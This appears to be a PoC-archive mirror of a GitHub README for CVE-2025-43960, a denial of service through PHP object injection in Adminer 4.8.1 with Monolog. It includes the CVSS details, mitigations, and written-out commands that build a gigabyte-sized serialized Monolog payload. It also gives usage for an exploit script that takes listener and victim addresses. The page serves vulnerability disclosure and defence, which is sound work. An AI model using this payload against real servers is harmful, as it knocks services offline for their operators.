Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-43960 PoC — Adminer 安全漏洞

Source
https://github.com/far00t01/CVE-2025-43960
Associated Vulnerability
Title:Adminer 安全漏洞 (CVE-2025-43960)
Description:Adminer 4.8.1, when using Monolog for logging, allows a Denial of Service (memory consumption) via a crafted serialized payload (e.g., using s:1000000000), leading to a PHP Object Injection issue. Remote, unauthenticated attackers can trigger this by sending a malicious serialized object, which forces excessive memory usage, rendering Adminer’s interface unresponsive and causing a server-level DoS. While the server may recover after several minutes, multiple simultaneous requests can cause a complete crash requiring manual intervention.
Description
CVE-2025-43960 - PHP Object Injection en Adminer < 4.8.1 con Monolog (DoS)
Readme
# CVE-2025-43960 - PHP Object Injection in Adminer < 4.8.1 via Monolog - Denial of Service (DoS)

# Summary
This vulnerability allows remote, unauthenticated attackers to exploit Adminer 4.8.1 instances using Monolog, causing Denial of Service (DoS) through PHP Object Injection.
The attack vector requires no authentication or user interaction, making it a high-severity issue (CVSS 7.5) with potential to escalate to 8.6 in certain shared environments.

https://github.com/user-attachments/assets/78c285de-9478-4e9c-a8a2-1f8da918ef9e

## Suggested description
Adminer 4.8.1, when using Monolog for logging, allows a denial of service (memory consumption) via a crafted serialized payload such as one with an `s:1000000000` string, aka a PHP Object Injection issue. The vulnerability affects Adminer instances using Monolog for logging, where untrusted user input is deserialized without proper validation.
By sending a large deserialized object, an attacker can force high memory consumption, making the Adminer interface unresponsive and causing a server-wide DoS.

- While the server may recover after several minutes, multiple concurrent requests can cause a complete crash, requiring manual intervention to restore service.

### CVSS Score v3.1

**Base Score:** 7.5 (High)  
**Vector:** `AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H`

**Note on specific deployments:**  
> If crashing Adminer also disrupts other services/tenants (e.g., container or shared process), **Scope: Changed** may apply:  
> - **Vector:** `AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H`  
> - **Score:** 8.6 (High)  

## Additional Information

### Potential Mitigation Measures
- Avoid using `unserialize()` on untrusted data within Adminer and Monolog.
- Enforce memory limits (`memory_limit`) in PHP to prevent excessive resource consumption.
- Use `allowed_classes` in `unserialize()` to restrict deserialization of unauthorized classes.

## Vendor of Product
- Adminer

## Affected Product Code Base
- Adminer `< 4.8.1` (latest stable release at the time of testing)

## Affected Component
- Monolog integration in Adminer

### Problematic feature
- PHP Object Injection via `unserialize()`

### Potential affected area
- Any Adminer instance where Monolog-based logging is used

# Proof of Concept (PoC)

**Payload generation:**

```bash
head -c 1000000000 </dev/zero | tr '\0' 'D' > filler.txt
```

```bash
echo 'O:32:"Monolog\\Handler\\SyslogUdpHandler":2:{
   s:9:"*socket";r:2;
   s:10:"*handler";s:1000000000:"'$(cat filler.txt)'";
 }' > payload.txt
```

Impact:
- The server enters a loading state, making Adminer inaccessible.
- The frontend disappears completely while the connection is active.
- When the attack stops, the server recovers after a few minutes unless multiple machines are used (DDoS scenario).

# Installation Requirements
- Python: Make sure you have Python 3.x installed. You can check this by running python3 --version in your terminal.

## Python Dependencies
- Flask: Used to run the local HTTP server that serves the payload.
- requests: Used to interact with the target application during the exploit process.

### Install
```
git clone https://github.com/far00t01/CVE-2025-43960
cd CVE-2025-43960 
pip install -r requirement.txt
python3 cve-2025-43960.py
```

## Usage:
```
python3 cve-2025-43960.py 

Usage: cve-2025-43960.py <ip-listener> <port-listener> <ip-victim:port>
Example: python3 cve-2025-43960.py 198.51.100.11 80 203.0.113.11:8000
```

### References

- https://www.adminer.org
- https://github.com/vrana/adminer
- https://github.com/Seldaek/monolog
- https://www.cvedetails.com/product/44183/Adminer-Adminer.html?vendor_id=17755
- https://cwe.mitre.org/data/definitions/502.html
- https://cwe.mitre.org/data/definitions/400.html
- https://cwe.mitre.org/data/definitions/789.html

### Discoverer
Fabian Rosales (@far00t01)
[Medium](https://https://medium.com/@far00t01/).
File Snapshot

 [4.0K]  /data/pocs/4a0f6d9964b95c19063eea05dcd13119c9c5d18d
├── [7.4K]  cve-2025-43960.py
├── [3.8K]  README.md
└── [  30]  requirement.txt

0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →